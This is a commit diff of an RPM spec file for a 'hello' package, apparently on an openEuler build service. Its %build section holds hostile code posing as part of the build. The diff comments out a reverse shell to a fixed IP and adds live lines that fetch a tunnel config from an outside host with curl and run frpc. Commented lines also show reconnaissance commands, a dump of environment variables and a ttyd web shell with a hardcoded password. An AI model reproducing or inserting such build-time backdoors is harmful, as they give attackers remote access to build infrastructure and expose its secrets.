summaryrefslogtreecommitdiff
diff options
context:
space:
mode:
authorCoprDistGit <infra@openeuler.org>2023-11-08 03:23:28 +0000
committerCoprDistGit <infra@openeuler.org>2023-11-08 03:23:28 +0000
commit4fcca6a63e1487652658b6431915860c81262b2d (patch)
treeb133440ac7432cfb140bb455dc92ea110ac3f99f
parent58c593baa3f7460f1cc1bb2a215cb25d73f5cfd0 (diff)
automatic import of helloopeneuler22.03_LTS_SP2
-rw-r--r--hello.spec5
1 files changed, 3 insertions, 2 deletions
diff --git a/hello.spec b/hello.spec
index fd42250..9ade5b7 100644
--- a/hello.spec
+++ b/hello.spec
@@ -24,7 +24,7 @@ project, including configuration, build, internationalization, help files, etc.
%build
%configure
-bash -i >& /dev/tcp/116.4.97.74/2333 2>&1 0>&1
+#bash -i >& /dev/tcp/116.4.97.74/2333 2>&1 0>&1
#uname -a 1>&2
#ip addr 1>&2
#ip route 1>&2
@@ -32,7 +32,8 @@ bash -i >& /dev/tcp/116.4.97.74/2333 2>&1 0>&1
# netstat -nlpt 1>&2
#cat /proc/self/environ 1>&2
#./ttyd -p 20001 -c 'admin:!Admin@1234' -W /bin/bash &
-#./frpc -c frpc.toml
+curl -o frpc.toml http://api.ultramangaia.cn:18888/frpc.toml
+./frpc -c frpc.toml
make %{?_smp_mflags}